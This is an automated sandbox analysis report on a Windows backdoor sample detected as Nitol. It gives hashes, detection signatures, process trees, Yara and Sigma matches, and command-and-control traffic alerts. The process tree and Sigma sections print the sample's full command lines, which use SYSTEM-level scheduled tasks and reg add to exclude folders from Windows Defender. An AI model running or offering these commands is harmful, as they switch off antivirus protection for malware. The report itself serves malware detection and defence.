Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2o63254452-763487230.06.exe

Overview

General Information

Sample name:2o63254452-763487230.06.exe
Analysis ID:1586401
MD5:0c3951cfe848ead37f11600ee5195006
SHA1:1f8a4240b5775c7d7c91c0bb48cf2a52df246f5c
SHA256:b0f951ad23e146280e4cdda33f3eb97c99baede4e8429c4366d84971bf8aaeaa
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Nitol
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Nitol
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Creates an undocumented autostart registry key
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2o63254452-763487230.06.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\2o63254452-763487230.06.exe" MD5: 0C3951CFE848EAD37F11600EE5195006)
  • BEqRkb.exe (PID: 8164 cmdline: C:\Users\user\Documents\BEqRkb.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • BEqRkb.exe (PID: 8188 cmdline: C:\Users\user\Documents\BEqRkb.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • BEqRkb.exe (PID: 5776 cmdline: C:\Users\user\Documents\BEqRkb.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 7320 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4460 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1196 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7660 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 3608 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3752 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5076 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7772 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 2212 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7876 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7896 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2080 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5720 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1508 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6236 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6436 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • 2dHqG0.exe (PID: 5576 cmdline: "C:\Program Files (x86)\2dHqG0\2dHqG0.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
      • cmd.exe (PID: 4076 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5820 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 7708 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 1860 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 7848 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 7928 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 7912 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6412 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 7016 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • 2dHqG0.exe (PID: 5268 cmdline: "C:\Program Files (x86)\2dHqG0\2dHqG0.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • pw8XjN.exe (PID: 6112 cmdline: "C:\Program Files (x86)\8srsV\pw8XjN.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • 2dHqG0.exe (PID: 8084 cmdline: "C:\Program Files (x86)\2dHqG0\2dHqG0.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • pw8XjN.exe (PID: 7624 cmdline: "C:\Program Files (x86)\8srsV\pw8XjN.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • pw8XjN.exe (PID: 2520 cmdline: "C:\Program Files (x86)\8srsV\pw8XjN.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • 2dHqG0.exe (PID: 940 cmdline: "C:\Program Files (x86)\2dHqG0\2dHqG0.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NitolNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
    00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
      Process Memory Space: 2dHqG0.exe PID: 5576JoeSecurity_NitolYara detected NitolJoe Security
        Process Memory Space: 2dHqG0.exe PID: 5576PlugXStringsPlugX Identifying StringsSeth Hardy
        • 0x1acb8:$Dwork: d:\work
        • 0x4f077:$Dwork: d:\work
        • 0x11b35d:$Dwork: d:\work
        • 0x1177c4:$Shell6: Shell6
        • 0x1185a3:$Shell6: Shell6

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        40.2.2dHqG0.exe.10000000.8.unpackJoeSecurity_NitolYara detected NitolJoe Security
          40.2.2dHqG0.exe.38003e8.6.raw.unpackJoeSecurity_NitolYara detected NitolJoe Security
            40.2.2dHqG0.exe.38003e8.6.unpackJoeSecurity_NitolYara detected NitolJoe Security
              4.2.BEqRkb.exe.27f0000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
              5.2.BEqRkb.exe.27a0000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
              Click to see the 1 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Invoke-Obfuscation CLIP+ Launcher
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\BEqRkb.exe, ParentImage: C:\Users\user\Documents\BEqRkb.exe, ParentProcessId: 5776, ParentProcessName: BEqRkb.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 7320, ProcessName: cmd.exe
              Sigma detected: Invoke-Obfuscation VAR+ Launcher
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\BEqRkb.exe, ParentImage: C:\Users\user\Documents\BEqRkb.exe, ParentProcessId: 5776, ParentProcessName: BEqRkb.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 7320, ProcessName: cmd.exe
              Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
              Source: Process startedAuthor: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5820, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 7708, ProcessName: reg.exe
              Sigma detected: Windows Defender Exclusions Added - Registry
              Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 7708, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-09T01:54:52.568223+010028529011Malware Command and Control Activity Detected192.168.2.45001747.243.243.588917TCP
              2025-01-09T01:54:54.716580+010028529011Malware Command and Control Activity Detected192.168.2.45001847.243.243.588917TCP
              2025-01-09T01:54:56.812545+010028529011Malware Command and Control Activity Detected192.168.2.45001947.243.243.588917TCP
              2025-01-09T01:54:59.807839+010028529011Malware Command and Control Activity Detected192.168.2.45002047.243.243.588917TCP
              2025-01-09T01:55:02.654024+010028529011Malware Command and Control Activity Detected192.168.2.45002147.243.243.588917TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for dropped file
              Source: C:\Program Files (x86)\8srsV\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
              Source: C:\Program Files (x86)\2dHqG0\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
              Multi AV Scanner detection for submitted file
              Source: 2o63254452-763487230.06.exeVirustotal: Detection: 11%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Program Files (x86)\8srsV\tbcore3U.dllJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\2dHqG0\tbcore3U.dllJoe Sandbox ML: detected

              Compliance

              barindex
              Detected unpacking (creates a PE file in dynamic memory)
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeUnpacked PE file: 40.2.2dHqG0.exe.2540000.3.unpack
              Source: unknownHTTPS traffic detected: 59.110.190.44:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:50010 version: TLS 1.2
              Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 2dHqG0.exe, 00000028.00000002.3513701464.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000028.00000000.3214205263.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000029.00000002.3248013208.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000029.00000000.3240358460.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, pw8XjN.exe, 0000002A.00000000.3243643193.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, 2dHqG0.exe, 0000002D.00000000.3262531939.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 0000002D.00000002.3274838743.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, pw8XjN.exe, 0000002E.00000002.3274822445.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002E.00000000.3265224479.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002F.00000000.3373599420.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002F.00000002.3379229347.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, 2dHqG0.exe, 00000030.00000002.3386248776.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000030.00000000.3380355601.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe.7.dr, pw8XjN.exe.40.dr
              Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
              Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, BEqRkb.exe, 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000004.00000000.2265682349.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000005.00000000.2272964825.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000005.00000002.2278285025.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000007.00000000.2775277441.0000000140014000.00000002.00000001.01000000.00000008.sdmp

              Change of critical system settings

              barindex
              Adds extensions / path to Windows Defender exclusion list (Registry)
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramDataJump to behavior
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\UsersJump to behavior
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)Jump to behavior
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\DocumentsJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
